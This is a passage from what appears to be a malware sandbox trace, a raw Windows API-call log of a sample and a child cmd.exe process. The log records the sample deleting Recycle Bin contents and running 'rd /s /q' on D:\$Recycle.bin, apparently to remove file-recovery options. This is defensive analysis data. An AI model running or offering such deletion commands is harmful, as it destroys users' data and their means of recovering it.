ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0081.822] FindFirstFileW (in: lpFileName="C:\\\\$Recycle.bin\\S-1-5-~1", lpFindFileData=0x3bedf8 | out: lpFindFileData=0x3bedf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x81, dwReserved1=0x6607f0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0x673208 [0081.822] FindClose (in: hFindFile=0x673208 | out: hFindFile=0x673208) returned 1 [0081.822] FindFirstFileW (in: lpFileName="C:\\\\$Recycle.bin\\S-1-5-~1\\*", lpFindFileData=0x3bedf8 | out: lpFindFileData=0x3bedf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x81, dwReserved1=0x6607f0, cFileName=".", cAlternateFileName="")) returned 0x660ff0 [0081.823] FindNextFileW (in: hFindFile=0x660ff0, lpFindFileData=0x3bedf8 | out: lpFindFileData=0x3bedf8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x81, dwReserved1=0x6607f0, cFileName="..", cAlternateFileName="")) returned 1 [0081.823] FindNextFileW (in: hFindFile=0x660ff0, lpFindFileData=0x3bedf8 | out: lpFindFileData=0x3bedf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x81, dwReserved1=0x6607f0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0081.823] DeleteFileW (lpFileName="C:\\\\$Recycle.bin\\S-1-5-~1\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-~1\\desktop.ini")) returned 1 [0081.825] FindNextFileW (in: hFindFile=0x660ff0, lpFindFileData=0x3bedf8 | out: lpFindFileData=0x3bedf8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x81, dwReserved1=0x6607f0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0081.826] FindClose (in: hFindFile=0x660ff0 | out: hFindFile=0x660ff0) returned 1 [0081.826] GetFullPathNameW (in: lpFileName="C:\\\\$Recycle.bin\\S-1-5-~1", nBufferLength=0x4, lpBuffer=0x3bedbc, lpFilePart=0x3bedb4 | out: lpBuffer="", lpFilePart=0x3bedb4*=0x0) returned 0x1a [0081.826] RemoveDirectoryW (lpPathName="C:\\\\$Recycle.bin\\S-1-5-~1" (normalized: "c:\\$recycle.bin\\s-1-5-~1")) returned 1 [0081.827] FindNextFileW (in: hFindFile=0x6731c8, lpFindFileData=0x3bf288 | out: lpFindFileData=0x3bf288*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0081.827] FindClose (in: hFindFile=0x6731c8 | out: hFindFile=0x6731c8) returned 1 [0081.827] GetFullPathNameW (in: lpFileName="C:\\\\$Recycle.bin", nBufferLength=0x4, lpBuffer=0x3bf24c, lpFilePart=0x3bf244 | out: lpBuffer="", lpFilePart=0x3bf244*=0x0) returned 0x11 [0081.827] RemoveDirectoryW (lpPathName="C:\\\\$Recycle.bin" (normalized: "c:\\$recycle.bin")) returned 1 [0081.827] GetProcessHeap () returned 0x660000 [0081.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x673190 | out: hHeap=0x660000) returned 1 [0081.827] GetProcessHeap () returned 0x660000 [0081.827] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x673148 | out: hHeap=0x660000) returned 1 [0081.827] _get_osfhandle (_FileHandle=1) returned 0x32c [0081.827] SetConsoleMode (hConsoleHandle=0x32c, dwMode=0x0) returned 0 [0081.827] _get_osfhandle (_FileHandle=1) returned 0x32c [0081.827] GetConsoleMode (in: hConsoleHandle=0x32c, lpMode=0x4aa041ac | out: lpMode=0x4aa041ac) returned 0 [0081.827] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0081.827] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4aa041b0 | out: lpMode=0x4aa041b0) returned 1 [0081.828] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0081.828] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0081.828] SetConsoleInputExeNameW () returned 0x1 [0081.828] GetConsoleOutputCP () returned 0x1b5 [0081.828] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa04260 | out: lpCPInfo=0x4aa04260) returned 1 [0081.828] SetThreadUILanguage (LangId=0x0) returned 0x409 [0081.828] exit (_Code=0) Process: id = "10" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x262000" os_pid = "0xa38" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"cmd.exe\" /c rd /s /q D:\\\\$Recycle.bin" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 84 os_tid = 0xa44 [0081.766] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x39f8a4 | out: lpSystemTimeAsFileTime=0x39f8a4*(dwLowDateTime=0xbd20a50, dwHighDateTime=0x1d6f0d1)) [0081.766] GetCurrentProcessId () returned 0xa38 [0081.766] GetCurrentThreadId () returned 0xa44 [0081.766] GetTickCount () returned 0x114af34 [0081.766] QueryPerformanceCounter (in: lpPerformanceCount=0x39f89c | out: lpPerformanceCount=0x39f89c*=20086652579) returned 1 [0081.767] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9e0000 [0081.767] __set_app_type (_Type=0x1) [0081.767] __p__fmode () returned 0x770331f4 [0081.767] __p__commode () returned 0x770331fc [0081.768] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4aa021a6) returned 0x0 [0081.768] __getmainargs (in: _Argc=0x4aa04238, _Argv=0x4aa04240, _Env=0x4aa0423c, _DoWildCard=0, _StartInfo=0x4aa04140 | out: _Argc=0x4aa04238, _Argv=0x4aa04240, _Env=0x4aa0423c) returned 0 [0081.768] GetCurrentThreadId () returned 0xa44 [0081.768] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa44) returned 0x60 [0081.768] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0081.768] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0081.768] SetThreadUILanguage (LangId=0x0) returned 0x409 [0081.795] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0081.795] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x39f834 | out: phkResult=0x39f834*=0x0) returned 0x2 [0081.795] VirtualQuery (in: lpAddress=0x39f86b, lpBuffer=0x39f804, dwLength=0x1c | out: lpBuffer=0x39f804*(BaseAddress=0x39f000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0081.795] VirtualQuery (in: lpAddress=0x2a0000, lpBuffer=0x39f804, dwLength=0x1c | out: lpBuffer=0x39f804*(BaseAddress=0x2a0000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0081.795] VirtualQuery (in: lpAddress=0x2a1000, lpBuffer=0x39f804, dwLength=0x1c | out: lpBuffer=0x39f804*(BaseAddress=0x2a1000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0081.795] VirtualQuery (in: lpAddress=0x2a3000, lpBuffer=0x39f804, dwLength=0x1c | out: lpBuffer=0x39f804*(BaseAddress=0x2a3000, AllocationBase=0x2a0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0081.795] VirtualQuery (in: lpAddress=0x3a0000, lpBuffer=0x39f804, dwLength=0x1c | out: lpBuffer=0x39f804*(BaseAddress=0x3a0000, AllocationBase=0x3a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0081.795] GetConsoleOutputCP () returned 0x1b5 [0081.797] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa04260 | out: lpCPInfo=0x4aa04260) returned 1 [0081.797] SetConsoleCtrlHandler (HandlerRoutine=0x4a9fe72a, Add=1) returned 1 [0081.798] _get_osfhandle (_FileHandle=1) returned 0x32c [0081.798] SetConsoleMode (hConsoleHandle=0x32c, dwMode=0x0) returned 0 [0081.798] _get_osfhandle (_FileHandle=1) returned 0x32c [0081.798] GetConsoleMode (in: hConsoleHandle=0x32c, lpMode=0x4aa041ac | out: lpMode=0x4aa041ac) returned 0 [0081.798] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0081.798] GetConsoleMode (in: hConsoleHandle=0xfffffffe, lpMode=0x4aa041b0 | out: lpMode=0x4aa041b0) returned 1 [0081.799] _get_osfhandle (_FileHandle=0) returned 0xfffffffe [0081.799] SetConsoleMode (hConsoleHandle=0xfffffffe, dwMode=0x7) returned 0 [0081.799] GetEnvironmentStringsW () returned 0x792000* [0081.799] GetProcessHeap () returned 0x780000 [0081.799] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0xaca) returned 0x792ad8 [0081.799] FreeEnvironmentStringsW (penv=0x792000) returned 1 [0081.800] GetProcessHeap () returned 0x780000 [0081.800] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x4) returned 0x790c38 [0081.800] GetEnvironmentStringsW () returned 0x792000* [0081.800] GetProcessHeap () returned 0x780000 [0081.800] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0xaca) returned 0x7935b0 [0081.800] FreeEnvironmentStringsW (penv=0x792000) returned 1 [0081.800] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39e7a4 | out: phkResult=0x39e7a4*=0x68) returned 0x0 [0081.800] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39e7ac, lpData=0x39e7b0, lpcbData=0x39e7a8*=0x1000 | out: lpType=0x39e7ac*=0x0, lpData=0x39e7b0*=0x0, lpcbData=0x39e7a8*=0x1000) returned 0x2 [0081.800] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39e7ac, lpData=0x39e7b0, lpcbData=0x39e7a8*=0x1000 | out: lpType=0x39e7ac*=0x4, lpData=0x39e7b0*=0x1, lpcbData=0x39e7a8*=0x4) returned 0x0 [0081.800] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39e7ac, lpData=0x39e7b0, lpcbData=0x39e7a8*=0x1000 | out: lpType=0x39e7ac*=0x0, lpData=0x39e7b0*=0x1, lpcbData=0x39e7a8*=0x1000) returned 0x2 [0081.800] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39e7ac, lpData=0x39e7b0, lpcbData=0x39e7a8*=0x1000 | out: lpType=0x39e7ac*=0x4, lpData=0x39e7b0*=0x0, lpcbData=0x39e7a8*=0x4) returned 0x0 [0081.800] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39e7ac, lpData=0x39e7b0, lpcbData=0x39e7a8*=0x1000 | out: lpType=0x39e7ac*=0x4, lpData=0x39e7b0*=0x40, lpcbData=0x39e7a8*=0x4) returned 0x0 [0081.800] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39e7ac, lpData=0x39e7b0, lpcbData=0x39e7a8*=0x1000 | out: lpType=0x39e7ac*=0x4, lpData=0x39e7b0*=0x40, lpcbData=0x39e7a8*=0x4) returned 0x0 [0081.800] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39e7ac, lpData=0x39e7b0, lpcbData=0x39e7a8*=0x1000 | out: lpType=0x39e7ac*=0x0, lpData=0x39e7b0*=0x40, lpcbData=0x39e7a8*=0x1000) returned 0x2 [0081.800] RegCloseKey (hKey=0x68) returned 0x0 [0081.800] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x39e7a4 | out: phkResult=0x39e7a4*=0x68) returned 0x0 [0081.800] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x39e7ac, lpData=0x39e7b0, lpcbData=0x39e7a8*=0x1000 | out: lpType=0x39e7ac*=0x0, lpData=0x39e7b0*=0x40, lpcbData=0x39e7a8*=0x1000) returned 0x2 [0081.801] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x39e7ac, lpData=0x39e7b0, lpcbData=0x39e7a8*=0x1000 | out: lpType=0x39e7ac*=0x4, lpData=0x39e7b0*=0x1, lpcbData=0x39e7a8*=0x4) returned 0x0 [0081.801] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x39e7ac, lpData=0x39e7b0, lpcbData=0x39e7a8*=0x1000 | out: lpType=0x39e7ac*=0x0, lpData=0x39e7b0*=0x1, lpcbData=0x39e7a8*=0x1000) returned 0x2 [0081.801] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x39e7ac, lpData=0x39e7b0, lpcbData=0x39e7a8*=0x1000 | out: lpType=0x39e7ac*=0x4, lpData=0x39e7b0*=0x0, lpcbData=0x39e7a8*=0x4) returned 0x0 [0081.801] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x39e7ac, lpData=0x39e7b0, lpcbData=0x39e7a8*=0x1000 | out: lpType=0x39e7ac*=0x4, lpData=0x39e7b0*=0x9, lpcbData=0x39e7a8*=0x4) returned 0x0 [0081.801] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x39e7ac, lpData=0x39e7b0, lpcbData=0x39e7a8*=0x1000 | out: lpType=0x39e7ac*=0x4, lpData=0x39e7b0*=0x9, lpcbData=0x39e7a8*=0x4) returned 0x0 [0081.801] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x39e7ac, lpData=0x39e7b0, lpcbData=0x39e7a8*=0x1000 | out: lpType=0x39e7ac*=0x0, lpData=0x39e7b0*=0x9, lpcbData=0x39e7a8*=0x1000) returned 0x2 [0081.801] RegCloseKey (hKey=0x68) returned 0x0 [0081.801] time (in: timer=0x0 | out: timer=0x0) returned 0x600aeb71 [0081.801] srand (_Seed=0x600aeb71) [0081.801] GetCommandLineW () returned="\"cmd.exe\" /c rd /s /q D:\\\\$Recycle.bin" [0081.801] GetCommandLineW () returned="\"cmd.exe\" /c rd /s /q D:\\\\$Recycle.bin" [0081.801] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0081.801] GetProcessHeap () returned 0x780000 [0081.801] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x210) returned 0x792000 [0081.801] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x792008, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0081.801] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4aa10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0081.802] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4aa10640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0081.802] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4aa10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0081.802] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0081.802] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0081.802] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0081.802] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0081.802] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0081.802] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0081.802] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0081.802] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0081.802] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0081.802] GetProcessHeap () returned 0x780000 [0081.802] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x792ad8 | out: hHeap=0x780000) returned 1 [0081.802] GetEnvironmentStringsW () returned 0x792218* [0081.802] GetProcessHeap () returned 0x780000 [0081.802] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0xae2) returned 0x794b78 [0081.802] FreeEnvironmentStringsW (penv=0x792218) returned 1 [0081.802] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4aa10640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0081.802] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4aa10640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0081.802] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0081.802] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0081.802] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0081.802] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0081.802] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0081.802] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0081.802] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0081.802] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0081.802] GetProcessHeap () returned 0x780000 [0081.802] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x7c) returned 0x795668 [0081.802] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x39f570 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0081.803] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", nBufferLength=0x104, lpBuffer=0x39f570, lpFilePart=0x39f56c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFilePart=0x39f56c*="Temp") returned 0x39 [0081.803] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp")) returned 0x2010 [0081.803] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x39f2ec | out: lpFindFileData=0x39f2ec*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x791e80 [0081.803] FindClose (in: hFindFile=0x791e80 | out: hFindFile=0x791e80) returned 1 [0081.803] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x39f2ec | out: lpFindFileData=0x39f2ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x791e80 [0081.803] FindClose (in: hFindFile=0x791e80 | out: hFindFile=0x791e80) returned 1 [0081.803] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0081.803] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData", lpFindFileData=0x39f2ec | out: lpFindFileData=0x39f2ec*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 0x791e80 [0081.803] FindClose (in: hFindFile=0x791e80 | out: hFindFile=0x791e80) returned 1 [0081.803] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFindFileData=0x39f2ec | out: lpFindFileData=0x39f2ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xffed8bb0, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffed8bb0, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Local", cAlternateFileName="")) returned 0x791e80 [0081.803] FindClose (in: hFindFile=0x791e80 | out: hFindFile=0x791e80) returned 1 [0081.804] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs", lpFindFileData=0x39f2ec | out: lpFindFileData=0x39f2ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffed8bb0, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffed8bb0, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Programs", cAlternateFileName="")) returned 0x791e80 [0081.804] FindClose (in: hFindFile=0x791e80 | out: hFindFile=0x791e80) returned 1 [0081.804] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpFindFileData=0x39f2ec | out: lpFindFileData=0x39f2ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xffed8bb0, ftCreationTime.dwHighDateTime=0x1d6f0d0, ftLastAccessTime.dwLowDateTime=0xffefed10, ftLastAccessTime.dwHighDateTime=0x1d6f0d0, ftLastWriteTime.dwLowDateTime=0xffefed10, ftLastWriteTime.dwHighDateTime=0x1d6f0d0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x791e80 [0081.804] FindClose (in: hFindFile=0x791e80 | out: hFindFile=0x791e80) returned 1 [0081.804] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp")) returned 0x2010 [0081.804] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\programs\\temp")) returned 1 [0081.804] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 1 [0081.804] GetProcessHeap () returned 0x780000 [0081.804] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x794b78 | out: hHeap=0x780000) returned 1 [0081.804] GetEnvironmentStringsW () returned 0x794088* [0081.804] GetProcessHeap () returned 0x780000 [0081.804] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0xb5e) returned 0x7956f0 [0081.804] FreeEnvironmentStringsW (penv=0x794088) returned 1 [0081.804] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4aa05260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0081.804] GetProcessHeap () returned 0x780000 [0081.804] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x795668 | out: hHeap=0x780000) returned 1 [0081.804] GetProcessHeap () returned 0x780000 [0081.804] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x400e) returned 0x796258 [0081.805] GetProcessHeap () returned 0x780000 [0081.805] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x40) returned 0x791e80 [0081.805] GetProcessHeap () returned 0x780000 [0081.805] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x796258 | out: hHeap=0x780000) returned 1 [0081.805] GetConsoleOutputCP () returned 0x1b5 [0081.805] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4aa04260 | out: lpCPInfo=0x4aa04260) returned 1 [0081.805] GetUserDefaultLCID () returned 0x409 [0081.806] GetLocaleInfoW (in: Locale=0x409, 